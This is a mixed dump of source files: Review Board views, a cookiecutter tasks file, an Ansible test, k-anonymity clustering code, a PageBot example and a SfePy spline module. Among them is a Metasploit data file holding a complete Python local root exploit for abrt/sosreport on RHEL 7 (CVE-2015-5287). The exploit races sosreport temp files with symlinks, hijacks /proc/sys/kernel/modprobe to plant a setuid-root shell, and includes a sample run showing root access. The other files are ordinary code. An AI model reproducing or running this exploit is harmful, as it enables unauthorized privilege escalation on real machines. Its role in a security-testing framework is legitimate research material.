This just falls back to the djblets ConfigPagesView.dispatch
implementation.
"""
pass
@property
def nav_title(self):
"""Get the title for the navigation section."""
return self.request.user.username
@property
def page_classes(self):
"""The list of page classes for this view.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, only the privacy page will be
shown.
"""
if self.is_user_missing_consent:
return [AccountPage.registry.get('page_id', PrivacyPage.page_id)]
return list(AccountPage.registry)
@cached_property
def ordered_user_local_sites(self):
"""Get the user's local sites, ordered by name."""
return self.request.user.local_site.order_by('name')
@property
def render_sidebar(self):
"""Whether or not to render the sidebar.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, the sidebar will not render.
This is to prevent the user from navigating away from the privacy page
before making decisions.
"""
return not self.is_user_missing_consent
@cached_property
def is_user_missing_consent(self):
"""Whether or not the user is missing consent."""
return is_consent_missing(self.request.user)
@login_required
@preview_email(prepare_password_changed_mail)
def preview_password_changed_email(request):
return {
'user': request.user,
}
@login_required
@feature_required(oauth2_service_feature)
def edit_oauth_app(request, app_id=None):
"""Create or edit an OAuth2 application.
Args:
request (django.http.HttpRequest):
The current HTTP request.
app_id (int, optional):
The ID of the application to edit.
If this argument is ``None`` a new application will be edited.
Returns:
django.http.HttpResponse:
The rendered view.
"""
# If we import this at global scope, it will cause issues with admin sites
# being automatically registered.
from reviewboard.oauth.admin import ApplicationAdmin
if app_id:
app = get_object_or_404(
Application,
pk=app_id,
user=request.user,
)
form_cls = UserApplicationChangeForm
fieldsets = ApplicationAdmin.fieldsets
else:
app = None
form_cls = UserApplicationCreationForm
fieldsets = ApplicationAdmin.add_fieldsets
if request.method == 'POST':
form_data = request.POST.copy()
form = form_cls(user=request.user, data=form_data, initial=None,
instance=app)
if form.is_valid():
app = form.save()
if app_id is not None:
next_url = OAuth2Page.get_absolute_url()
else:
next_url = reverse('edit-oauth-app', args=(app.pk,))
return HttpResponseRedirect(next_url)
else:
form = form_cls(user=request.user, data=None, initial=None,
instance=app)
# Show a warning at the top of the form when the form is disabled for
# security.
#
# We don't need to worry about full_clean not being called (which would
# be if we went through form.errors) because this form will never be
# saved.
if app and app.is_disabled_for_security:
form._errors = ErrorDict({
'__all__': form.error_class(
[form.DISABLED_FOR_SECURITY_ERROR],
),
})
return render(
request=request,
template_name='accounts/edit_oauth_app.html',
context={
'app': app,
'form': form,
'fieldsets': filter_fieldsets(form=form_cls,
fieldsets=fieldsets),
'oauth2_page_url': OAuth2Page.get_absolute_url(),
'request': request,
})
| 1.210938 | 1 |
{{cookiecutter.project_slug}}/tasks.py | i2biz/cookiecutter-python-pylint | 0 | 12770008 | <filename>{{cookiecutter.project_slug}}/tasks.py
# coding=utf-8
from invoke import task
@task
def style(ctx):
ctx.run(
"black --check {{cookiecutter.project_slug}} {{cookiecutter.project_slug}}_test"
)
@task
def lint(ctx):
ctx.run(
"pylint {{cookiecutter.project_slug}} {{cookiecutter.project_slug}}_test -r n"
)
@task
def test(ctx):
ctx.run(
"py.test -v --cov {{cookiecutter.project_slug}} --cov-report=html --cov-report=term-missing {{cookiecutter.project_slug}}_test"
)
@task(pre=[test, style, lint])
def check(ctx):
pass
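# Example invocation (added as an illustration; assumes the `invoke`
# CLI from pyinvoke is installed in the active environment):
#
#   $ invoke style lint test   # run the checks individually
#   $ invoke check             # or run test, style and lint together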
| 1.921875 | 2 |
test/test_image_streamer_deployment_group_facts.py | nabhajit-ray/oneview-ansible | 108 | 12770009 | <reponame>nabhajit-ray/oneview-ansible
#!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import pytest
from hpe_test_utils import ImageStreamerBaseFactsTest
from oneview_module_loader import DeploymentGroupFactsModule
@pytest.mark.resource(TestDeploymentGroupFactsModule='deployment_groups')
class TestDeploymentGroupFactsModule(ImageStreamerBaseFactsTest):
"""
    ImageStreamerBaseFactsTest provides common tests for parameter support.
"""
DEPLOYMENT_GROUP = dict(
name="OSS",
uri="/rest/deployment-group/d1c7b09a-6c7b-4ae0-b68e-ed208ccde1b0")
def test_get_all_deployment_groups(self):
self.resource.get_all.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[0]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
def test_get_a_deployment_group_by_name(self):
self.resource.get_by.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[4]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
if __name__ == '__main__':
pytest.main([__file__])
| 1.898438 | 2 |
clustering_based/clustering_based_k_anon.py | fhstp/k-Anonymity | 4 | 12770010 | # -*- coding: utf-8 -*-
"""
main module for cluster_based_k_anon
"""
import operator
import random
import time
from functools import cmp_to_key
from basic_mondrian.models.numrange import NumRange
from basic_mondrian.utils.utility import (cmp_str, get_num_list_from_str,
qid_to_key)
__DEBUG = False
# att_tree store root node for each att
ATT_TREES = []
# databack store all record for dataset
LEN_DATA = 0
QI_LEN = 0
QI_RANGE = []
IS_CAT = []
# get_LCA, generalization and NCP are expensive, and most of the calls are duplicates,
# so we cache their results to reduce the running time
LCA_CACHE = []
NCP_CACHE = {}
class Cluster(object):
"""Cluster is for cluster based k-anonymity
self.member: record list in cluster
    self.gen_result: generalized value for one cluster
"""
def __init__(self, member, gen_result, information_loss=0.0):
self.information_loss = information_loss
self.member = member
self.gen_result = gen_result[:]
self.center = gen_result[:]
for i in range(QI_LEN):
if IS_CAT[i] is False:
self.center[i] = str(sum([float(t[i]) for t in self.member]) * 1.0 / len(self.member))
def add_record(self, record):
"""
add record to cluster
"""
self.member.append(record)
self.update_gen_result(record, record)
def update_cluster(self):
"""update cluster information when member is changed
"""
self.gen_result = cluster_generalization(self.member)
for i in range(QI_LEN):
if IS_CAT[i]:
self.center[i] = self.gen_result[i]
else:
self.center[i] = str(sum([float(t[i]) for t in self.member]) * 1.0 / len(self.member))
self.information_loss = len(self.member) * NCP(self.gen_result)
def update_gen_result(self, merge_gen_result, center, num=1):
"""
        update gen_result and information_loss after adding a record or merging a cluster
        :param merge_gen_result: generalized values to merge into this cluster
        :param center: center of the merged records
        :param num: number of merged records
"""
self.gen_result = generalization(self.gen_result, merge_gen_result)
current_len = len(self.member)
for i in range(QI_LEN):
if IS_CAT[i]:
self.center[i] = self.gen_result[i]
else:
self.center[i] = str((float(self.center[i]) * (current_len - num) +
float(center[i]) * num) / current_len)
self.information_loss = len(self.member) * NCP(self.gen_result)
def add_same_record(self, record):
"""
add record with same qid to cluster
"""
self.member.append(record)
def merge_cluster(self, cluster):
"""merge cluster into self and do not delete cluster elements.
update self.gen_result
"""
self.member.extend(cluster.member)
self.update_gen_result(cluster.gen_result, cluster.center, len(cluster))
def __getitem__(self, item):
"""
:param item: index number
:return: gen_result[item]
"""
return self.gen_result[item]
def __len__(self):
"""
return number of records in cluster
"""
return len(self.member)
def __str__(self):
return str(self.gen_result)
def r_distance(source, target):
"""
    Return the distance between source (cluster or record)
    and target (cluster or record). The distance is based on
    NCP (Normalized Certainty Penalty) on the relational part.
    If source or target is a cluster, the distance is weighted
    by source_len (or target_len).
"""
source_gen = source
target_gen = target
source_len = 1
target_len = 1
# check if target is Cluster
if isinstance(target, Cluster):
target_gen = target.gen_result
target_len = len(target)
    # check if source is Cluster
if isinstance(source, Cluster):
source_gen = source.gen_result
source_len = len(source)
if source_gen == target_gen:
return 0
gen = generalization(source_gen, target_gen)
# len should be taken into account
distance = (source_len + target_len) * NCP(gen)
return distance
def diff_distance(record, cluster):
"""
Return IL(cluster and record) - IL(cluster).
"""
gen_after = generalization(record, cluster.gen_result)
return NCP(gen_after) * (len(cluster) + 1) - cluster.information_loss
def NCP(record):
"""Compute NCP (Normalized Certainty Penalty)
when generate record to gen_result.
"""
ncp = 0.0
# exclude SA values(last one type [])
list_key = qid_to_key(record)
try:
return NCP_CACHE[list_key]
except KeyError:
pass
for i in range(QI_LEN):
# if leaf_num of numerator is 1, then NCP is 0
width = 0.0
if IS_CAT[i] is False:
try:
float(record[i])
except ValueError:
temp = record[i].split(',')
width = float(temp[1]) - float(temp[0])
else:
width = len(ATT_TREES[i][record[i]]) * 1.0
width /= QI_RANGE[i]
ncp += width
NCP_CACHE[list_key] = ncp
return ncp
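# Illustrative sketch (added; the numbers are hypothetical): with
# QI_RANGE = [50, ...], a numeric attribute generalized to '30,40'
# contributes (40 - 30) / 50 = 0.2 to the penalty, a single numeric
# value contributes 0, and a categorical attribute contributes
# leaf_count(value) / total_leaf_count, so the root '*' contributes
# 1.0. NCP sums these per-attribute widths over all QI attributes.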
def get_LCA(index, item1, item2):
"""Get lowest commmon ancestor (including themselves)"""
# get parent list from
if item1 == item2:
return item1
try:
return LCA_CACHE[index][item1 + item2]
except KeyError:
pass
parent1 = ATT_TREES[index][item1].parent[:]
parent2 = ATT_TREES[index][item2].parent[:]
parent1.insert(0, ATT_TREES[index][item1])
parent2.insert(0, ATT_TREES[index][item2])
min_len = min(len(parent1), len(parent2))
last_LCA = parent1[-1]
    # note: when indexing the lists from the end, remember that -0 == 0
for i in range(1, min_len + 1):
if parent1[-i].value == parent2[-i].value:
last_LCA = parent1[-i]
else:
break
LCA_CACHE[index][item1 + item2] = last_LCA.value
return last_LCA.value
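# Illustrative sketch (added; the hierarchy is hypothetical): in a
# workclass tree where the leaves 'Private' and 'State-gov' hang
# under the internal node 'Employed', get_LCA(i, 'Private',
# 'State-gov') compares both parent chains from the root downwards
# and returns 'Employed', the deepest node the two chains share.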
def generalization(record1, record2):
"""
Compute relational generalization result of record1 and record2
"""
gen = []
for i in range(QI_LEN):
if IS_CAT[i] is False:
split_number = []
split_number.extend(get_num_list_from_str(record1[i]))
split_number.extend(get_num_list_from_str(record2[i]))
split_number = list(set(split_number))
if len(split_number) == 1:
gen.append(split_number[0])
else:
split_number.sort(key=cmp_to_key(cmp_str))
gen.append(split_number[0] + ',' + split_number[-1])
else:
gen.append(get_LCA(i, record1[i], record2[i]))
return gen
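# Illustrative sketch (added; the values are hypothetical):
#   generalization(['34', 'Private'], ['30,40', 'State-gov'])
# merges the numeric parts into '30,40' (the min/max over all
# interval endpoints) and replaces the categorical parts with their
# lowest common ancestor in the attribute hierarchy.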
def cluster_generalization(records):
"""
    Compute the relational generalization result for records (list)
    by folding generalization() over the list.
"""
len_r = len(records)
gen = records[0]
for i in range(1, len_r):
gen = generalization(gen, records[i])
return gen
def find_best_knn(index, k, data):
"""key fuction of KNN. Find k nearest neighbors of record, remove them from data"""
dist_dict = {}
record = data[index]
    # compute the distance from the seed record to every other record
for i, t in enumerate(data):
if i == index:
continue
dist = r_distance(record, t)
dist_dict[i] = dist
sorted_dict = sorted(dist_dict.items(), key=operator.itemgetter(1))
knn = sorted_dict[:k - 1]
knn.append((index, 0))
record_index = [t[0] for t in knn]
elements = [data[t[0]] for t in knn]
gen = cluster_generalization(elements)
cluster = Cluster(elements, gen, k * NCP(gen))
    # the caller removes these records from data using record_index
return cluster, record_index
def find_best_cluster_iloss(record, clusters):
    """Residual assignment: find the best cluster for the record."""
    min_distance = 1000000000000
    min_index = 0
    for i, t in enumerate(clusters):
        distance = r_distance(record, t.gen_result)
        if distance < min_distance:
            min_distance = distance
            min_index = i
    # the caller adds the record to the cluster at min_index
    return min_index
def find_best_cluster_iloss_increase(record, clusters):
    """Residual assignment: find the best cluster for the record."""
    min_diff = 1000000000000
    min_index = 0
    for i, t in enumerate(clusters):
        IF_diff = diff_distance(record, t)
        if IF_diff < min_diff:
            min_diff = IF_diff
            min_index = i
    # the caller adds the record to the cluster at min_index
    return min_index
def find_furthest_record(record, data):
"""
    :param record: the latest record added to the cluster
    :param data: remaining records in data
    :return: the index of the record furthest from the given record
"""
max_distance = 0
max_index = -1
for index in range(len(data)):
current_distance = r_distance(record, data[index])
if current_distance >= max_distance:
max_distance = current_distance
max_index = index
return max_index
def find_best_record_iloss_increase(cluster, data):
"""
    :param cluster: the current cluster
    :param data: remaining records in data
:return: index of record with min diff on information loss
"""
min_diff = 1000000000000
min_index = 0
for index, record in enumerate(data):
# IL(cluster and record) and |cluster| + 1 is a constant
# so IL(record, cluster.gen_result) is enough
IF_diff = diff_distance(record, cluster)
if IF_diff < min_diff:
min_diff = IF_diff
min_index = index
return min_index
def clustering_knn(data, k=25):
"""
    Group records according to QID distance (KNN).
"""
clusters = []
# randomly choose seed and find k-1 nearest records to form cluster with size k
while len(data) >= k:
index = random.randrange(len(data))
cluster, record_index = find_best_knn(index, k, data)
data = [t for i, t in enumerate(data[:]) if i not in set(record_index)]
clusters.append(cluster)
# residual assignment
while len(data) > 0:
t = data.pop()
cluster_index = find_best_cluster_iloss(t, clusters)
clusters[cluster_index].add_record(t)
return clusters
def clustering_kmember(data, k=25):
"""
    Group records according to NCP (k-member).
"""
clusters = []
    # start from a random record, then repeatedly pick the furthest record as the next cluster seed
r_pos = random.randrange(len(data))
r_i = data[r_pos]
while len(data) >= k:
r_pos = find_furthest_record(r_i, data)
r_i = data.pop(r_pos)
cluster = Cluster([r_i], r_i)
while len(cluster) < k:
r_pos = find_best_record_iloss_increase(cluster, data)
r_j = data.pop(r_pos)
cluster.add_record(r_j)
clusters.append(cluster)
# residual assignment
while len(data) > 0:
t = data.pop()
cluster_index = find_best_cluster_iloss_increase(t, clusters)
clusters[cluster_index].add_record(t)
return clusters
def adjust_cluster(cluster, residual, k):
    """Trim an oversized cluster to k members, moving the members
    farthest from the cluster center into the residual list."""
    center = cluster.center
dist_dict = {}
    # compute the distance of each member to the cluster center
for i, t in enumerate(cluster.member):
dist = r_distance(center, t)
dist_dict[i] = dist
    sorted_dict = sorted(dist_dict.items(), key=operator.itemgetter(1))
need_adjust_index = [t[0] for t in sorted_dict[k:]]
need_adjust = [cluster.member[t] for t in need_adjust_index]
residual.extend(need_adjust)
# update cluster
cluster.member = [t for i, t in enumerate(cluster.member)
if i not in set(need_adjust_index)]
cluster.update_cluster()
def clustering_oka(data, k=25):
"""
    Group records according to NCP (OKA: one-time-pass k-means).
"""
clusters = []
can_clusters = []
less_clusters = []
    # randomly choose len(data) // k seed records, one per candidate cluster
    seed_index = random.sample(range(len(data)), len(data) // k)
for index in seed_index:
record = data[index]
can_clusters.append(Cluster([record], record))
data = [t for i, t in enumerate(data[:]) if i not in set(seed_index)]
while len(data) > 0:
record = data.pop()
index = find_best_cluster_iloss(record, can_clusters)
can_clusters[index].add_record(record)
residual = []
for cluster in can_clusters:
if len(cluster) < k:
less_clusters.append(cluster)
else:
if len(cluster) > k:
adjust_cluster(cluster, residual, k)
clusters.append(cluster)
while len(residual) > 0:
record = residual.pop()
if len(less_clusters) > 0:
index = find_best_cluster_iloss(record, less_clusters)
less_clusters[index].add_record(record)
            if len(less_clusters[index]) >= k:
clusters.append(less_clusters.pop(index))
else:
index = find_best_cluster_iloss(record, clusters)
clusters[index].add_record(record)
return clusters
def init(att_trees, data, SA_num, QI_num=-1):
"""
init global variables
"""
global ATT_TREES, DATA_BACKUP, LEN_DATA, QI_RANGE, IS_CAT, QI_LEN, LCA_CACHE, NCP_CACHE, SA_INDEX
SA_INDEX = SA_num
ATT_TREES = att_trees
QI_RANGE = []
IS_CAT = []
LEN_DATA = len(data)
LCA_CACHE = []
NCP_CACHE = {}
if QI_num <= 0:
QI_LEN = len(data[0]) - 1
else:
QI_LEN = QI_num
for i in range(QI_LEN):
LCA_CACHE.append(dict())
if isinstance(ATT_TREES[i], NumRange):
IS_CAT.append(False)
QI_RANGE.append(ATT_TREES[i].range)
else:
IS_CAT.append(True)
QI_RANGE.append(len(ATT_TREES[i]['*']))
def clustering_based_k_anon(att_trees, data, k, QI_num, SA_num, type_alg):
"""
the main function of clustering based k-anon
"""
init(att_trees, data, SA_num, QI_num)
result = []
start_time = time.time()
if type_alg == 'knn':
print("Begin to KNN Cluster based on NCP")
clusters = clustering_knn(data, k)
elif type_alg == 'kmember':
print("Begin to K-Member Cluster based on NCP")
clusters = clustering_kmember(data, k)
elif type_alg == 'oka':
print("Begin to OKA Cluster based on NCP")
clusters = clustering_oka(data, k)
else:
print("Please choose merge algorithm types")
print("knn | kmember")
return (0, (0, 0))
rtime = float(time.time() - start_time)
ncp = 0.0
for cluster in clusters:
final_result = []
for i in range(len(cluster)):
            # custom: append the non-QI (sensitive attribute) values unchanged
tmp = []
for s in range(len(cluster.member[i]) - len(SA_INDEX), len(cluster.member[i])):
tmp += [cluster.member[i][s]]
final_result.append(cluster.gen_result + tmp)
result.extend(final_result)
ncp += cluster.information_loss
ncp /= LEN_DATA
ncp /= QI_LEN
ncp *= 100
if __DEBUG:
print("NCP=", ncp)
return (result, (ncp, rtime))
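# Hedged usage sketch (added; the argument values are hypothetical):
# the caller first builds one generalization hierarchy (or NumRange)
# per QI attribute, e.g. with the basic_mondrian helpers, then runs
#
#   result, (ncp, rtime) = clustering_based_k_anon(
#       att_trees, data, k=10, QI_num=8, SA_num=[-1], type_alg='oka')
#
# where `result` holds the anonymized records and `ncp` the
# information loss in percent.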
| 2.4375 | 2 |
test_apps/python_app/targets/dut/o1_dut0.py | Origen-SDK/o2 | 0 | 12770011 | <filename>test_apps/python_app/targets/dut/o1_dut0.py
origen.app.instantiate_dut("dut.o1_dut0")
| 1.257813 | 1 |
Basics/E07_Typography/E08_HeadlineAlignment.py | freder/PageBotExamples | 5 | 12770012 | <filename>Basics/E07_Typography/E08_HeadlineAlignment.py
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
#
# P A G E B O T E X A M P L E S
#
# www.pagebot.io
# Licensed under MIT conditions
#
# -----------------------------------------------------------------------------
#
# E08_HeadlineAlignment.py
#
from pagebot import getContext
from pagebot.fonttoolbox.objects.font import findFont
from pagebot.toolbox.units import em, p, pt
from pagebot.constants import *
from pagebot.elements import *
from pagebot.conditions import *
from pagebot.document import Document
context = getContext('DrawBot')
W, H = pt(1500, 1000) # Document size
PADDING = pt(100) # Page padding on all sides
G = p(2) # 2 Pica gutter
PW = W - 2*PADDING # Usable padded page width
PH = H - 2*PADDING # Usable padded page height
CW = (PW - G)/3 # Column width
CH = PH
# Hard coded grid for 3 columns, will be automatic in later examples.
GRIDX = ((CW, G), (CW, G), (CW, G))
GRIDY = ((CH, 0),) # No division in vertical grid.
BASELINE = G
NUM_PAGES = 1
# Get the font object for the PageBot-Regular font that is included in PageBot resources for testing.
f = findFont('PageBot-Regular')
# Make the style dictionary for the body text.
style = dict(font=f, fontSize=24, leading=em(1.4), textFill=0.3, hyphenation=LANGUAGE_EN)
# Create a new document with 1 page. Set overall size and padding.
doc = Document(w=W, h=H, padding=PADDING, gridX=GRIDX, gridY=GRIDY, context=context,
autoPages=NUM_PAGES, baselineGrid=BASELINE)
# Get the default page view of the document and set viewing parameters
view = doc.view
view.showTextOverflowMarker = True # Shows as [+] marker on bottom-right of page.
# TODO: Fix the Arrow-connection drawing
view.showFlowConnections = False # Draw arrows between elements of there is a flow.
view.showOrigin = True # Show position of elements as cross-hair
view.showGrid = [GRID_COL_BG, GRID_ROW_BG, GRID_SQR_BG] # Set types of grid lines to show for background
view.showBaselineGrid = True # Show default baseline grid of the column lines.
page = doc[1]
bs = context.newString('Headline Kphx', style=dict(font=f, fontSize=150, textFill=(1, 0, 0)))
e = newText(bs, x=100, y=300, parent=page,
conditions=[Fit2Width(), Shrink2TextHeight(), CapHeight2Top()])
print(sorted(e.baselines), e.parent.top, e.top, e.bottom, e.bs.size, context.b.textSize(e.bs.s))
page.solve()
print(sorted(e.baselines), e.parent.top, e.top, e.bottom, e.bs.size, context.b.textSize(e.bs.s))
print(e.textLines)
doc.export('_export/HeadlineAlignment.pdf')
| 2.765625 | 3 |
Lib/test/bugs/pr183.py | jimmyyu2004/jython | 332 | 12770013 | <gh_stars>100-1000
# Test case for PR#183; print of a recursive PyStringMap causes a JVM stack
# overflow.
g = globals()
print(g)
| 1.6875 | 2 |
api/services/__init__.py | adkl/etf_online_competition_system | 0 | 12770014 | <reponame>adkl/etf_online_competition_system<gh_stars>0
from .etf_oracle_service import EtfOracleService
| 1.0625 | 1 |
data/exploits/cve-2015-5287/sosreport-rhel7.py | OsmanDere/metasploit-framework | 26,932 | 12770015 | <reponame>OsmanDere/metasploit-framework<filename>data/exploits/cve-2015-5287/sosreport-rhel7.py
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
pid = os.fork()
if pid == 0:
os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
while 1:
r = glob.glob(p)
if len(r) > 0:
return r
time.sleep(0.05)
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
print "moving tmpfiles"
for x in tmpfiles:
print "%s -> %s" % (x,x + ".old")
os.rename(x, x + ".old")
open(x, "w+").write("/tmp/hax.sh\n")
os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except: pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
sys.exit(-1)
for x in xrange(0,60*10):
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
print "done"
trigger()
time.sleep(1)
sys.stderr.write(".")
print "timed out" | 1.328125 | 1 |
sfepy/mesh/splinebox.py | clazaro/sfepy | 0 | 12770016 | <gh_stars>0
from __future__ import absolute_import
from __future__ import print_function
import numpy as nm
from .bspline import BSpline
from sfepy.base.base import Struct
from six.moves import range
class SplineBox(Struct):
"""
B-spline geometry parametrization. The geometry can be modified
by moving spline control points.
"""
@staticmethod
def gen_cp_idxs(ncp):
dim = len(ncp)
if dim == 2:
idxs = nm.mgrid[0:ncp[0], 0:ncp[1]]
elif dim == 3:
idxs = nm.mgrid[0:ncp[0], 0:ncp[1], 0:ncp[2]]
else:
raise(ValueError)
mul_idx = [1]
for ii in range(dim - 1):
mul_idx.append(mul_idx[ii] * ncp[ii])
cp_idxs = []
for ii in range(dim):
cp_idxs.append(idxs[ii].reshape(nm.prod(ncp), order='F'))
return cp_idxs, nm.array(mul_idx)
@staticmethod
def create_spb(bbox, coors, degree=3, nsg=None):
nc, cdim = coors.shape
        inside = nm.ones((nc,), dtype=bool)
        nsg = nm.ones((cdim,), dtype=int) if nsg is None else nm.array(nsg)
for idim in range(cdim):
inrange = nm.logical_and(coors[:, idim] >= bbox[idim][0],
coors[:, idim] <= bbox[idim][1])
inside = nm.logical_and(inside, inrange)
ncp_tot = 1
base, uidx, ncp, cp = [], [], [], []
for idim in range(cdim):
ucoors, ucoors_idx = nm.unique(coors[inside, idim],
return_inverse=True)
ncp0 = degree + nsg[idim]
bspl = BSpline(degree, ncp=ncp0)
bspl.make_knot_vector(knot_range=(bbox[idim][0], bbox[idim][1]))
knots = bspl.get_knot_vector()
cp0 = nm.zeros((ncp0,), dtype=nm.double)
for j in range(cp0.shape[0]):
cp0[j] = nm.sum(knots[(j + 1):(j + degree + 1)]) / degree
base.append(bspl.eval_basis(t=ucoors, return_val=True))
uidx.append(ucoors_idx)
ncp.append(ncp0)
cp.append(cp0)
ncp_tot *= ncp0
cp_coors = nm.zeros((ncp_tot, cdim), dtype=nm.double)
cp_idx, mul_cp_idx = SplineBox.gen_cp_idxs(ncp)
for ii in range(cdim):
cp_coors[:, ii] = cp[ii][cp_idx[ii]]
return {'base': base,
'uidx': uidx,
'ncp': ncp,
'cp_idx': cp_idx,
'mul_cp_idx': mul_cp_idx,
'cp_coors': cp_coors,
'idxs_inside': inside}
def __init__(self, bbox, coors, nsg=None, field=None):
"""
Create a SplineBox.
Parameters
----------
bbox : array
The mesh bounding box.
coors : array
The coordinates of mesh nodes.
        nsg : array
            The number of segments.
        field : array
            The field values to parametrize; if None, the coordinates
            themselves are used.
        """
bbox = nm.asarray(bbox)
coors = nm.asarray(coors)
self.coors = coors.copy()
self.cdim = coors.shape[1]
if field is not None:
field = nm.asarray(field)
if len(field.shape) <= 1:
field = field[..., nm.newaxis]
self.field = field.copy()
else:
self.field = self.coors
self.__dict__.update(self.create_spb(bbox, coors, nsg=nsg))
if field is not None:
if hasattr(self, 'idxs_inside'):
b = field[self.idxs_inside, ...]
else:
b = field
a = self.get_box_matrix()
self.cp_values = nm.linalg.lstsq(a, b)[0]
else:
self.cp_values = self.cp_coors
self.cp_values0 = self.cp_values.copy()
def get_coors_shape(self):
"""
Get the shape of the coordinates.
"""
return self.coors.shape
def get_control_points(self, init=False):
"""
Get the spline control points coordinates.
        Parameters
        ----------
        init : bool
            If True, return the initial state.

        Returns
        -------
        cpt_coors : array
            The coordinates of the spline control points.
        """
if init:
return self.cp_values0
else:
return self.cp_values
def set_control_points(self, cpt_coors, add=False):
"""
Set the spline control points position.
Parameters
----------
cpt_coors : array
The coordinates of the spline control points.
add : bool
If True, coors += cpt_coors
"""
if add:
self.cp_values += cpt_coors
else:
self.cp_values = cpt_coors
def move_control_point(self, cpoint, val):
"""
Change shape of spline parametrization.
Parameters
----------
cpoint : int, list
The position (index or grid indicies) of the spline control point.
val : array
Displacement.
"""
if type(cpoint) in [list, tuple, nm.ndarray]:
idx = nm.dot(nm.array(cpoint), self.mul_cp_idx)
else:
idx = cpoint
self.cp_values[idx, :] += val
def get_box_matrix(self):
"""
        Returns
        -------
        mtx : 2D array
            The matrix containing the coefficients of the B-spline
            basis functions.
"""
ncp, cdim = self.cp_coors.shape
mtx = nm.ones((self.uidx[0].shape[0], ncp), dtype=nm.double)
for ii in range(cdim):
mtx *= self.base[ii][self.uidx[ii], :][:, self.cp_idx[ii]]
return mtx
def evaluate(self, cp_values=None, outside=True):
"""
Evaluate the new position of the mesh coordinates.
Parameters
----------
cp_values : array
The actual control point values. If None, use self.control_values.
outside : bool
If True, return also the coordinates outside the spline box.
Returns
-------
new_coors : array
The new position of the mesh coordinates.
"""
if cp_values is None:
cp_values = self.cp_values
mtx = self.get_box_matrix()
if outside and hasattr(self, 'idxs_inside'):
field = self.field.copy()
field[self.idxs_inside, ...] = nm.dot(mtx, cp_values)
return field
else:
return nm.dot(mtx, cp_values)
def evaluate_derivative(self, cpoint, dirvec):
"""
Evaluate derivative of the spline
in a given control point and direction.
Parameters
----------
cpoint : int, list
The position (index or grid indicies) of the spline control point.
dirvec : array
The directional vector.
Returns
-------
diff : array
The derivative field.
"""
if type(cpoint) in [list, tuple, nm.ndarray]:
idxs = cpoint
else:
idxs = []
aux = cpoint
for ii in range(self.cdim):
idxs.append(aux // self.mul_cp_idx[-(ii + 1)])
aux = aux % self.mul_cp_idx[-(ii + 1)]
idxs = idxs[::-1]
aux = nm.ones((self.uidx[0].shape[0],), dtype=nm.double)
for ii in range(self.cdim):
aux *= self.base[ii][self.uidx[ii], idxs[ii]]
dirvec = nm.asarray(dirvec)
return nm.dot(aux[:, nm.newaxis],
nm.reshape(dirvec, (1, self.cp_values.shape[1])))
def write_control_net(self, filename):
"""
Write the SplineBox shape to the VTK file.
Parameters
----------
filename : str
The VTK file name.
"""
ncp = self.ncp
npt = nm.prod(ncp)
f = open(filename, 'w')
f.write("# vtk DataFile Version 2.6\nspbox file\n"
"ASCII\nDATASET UNSTRUCTURED_GRID\n\n")
